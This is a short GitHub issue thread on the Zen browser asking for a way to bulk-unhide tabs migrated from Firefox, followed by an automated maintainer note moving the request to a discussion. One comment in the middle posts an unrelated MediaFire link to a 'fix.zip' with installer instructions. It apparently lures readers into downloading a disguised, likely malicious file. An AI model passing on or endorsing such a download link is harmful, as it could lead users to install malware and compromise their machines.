### ISSUE TITLE
Transfer hidden tabs to normal tabs or unhide them in bulk

### ISSUE THREAD

**Issue by itstamimi** [zen-browser/desktop#650]
### What feature would you like to see?

I migrated my tabs from firefox, once added, they are usually not loaded unless you click on it, in firefox, these tabs remain there until I open them, in Zen, and after closing the browser and open it again, it put all of these tabs in a 'hidden tabs' section instead of loading them into the normal one, I would like to keep them all in the default location or unhide them in bulk.
![Screenshot_20240825_034106](https://github.com/user-attachments/assets/6f9fca1b-7a39-4b00-8b21-93b8fccb0305)

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by mauro-balades** [comment]
This issue should be discussed further. You can view and continue the discussion here: https://github.com/zen-browser/desktop/discussions/774

 ~ This is an automatic operation to better enhancements requests organization.
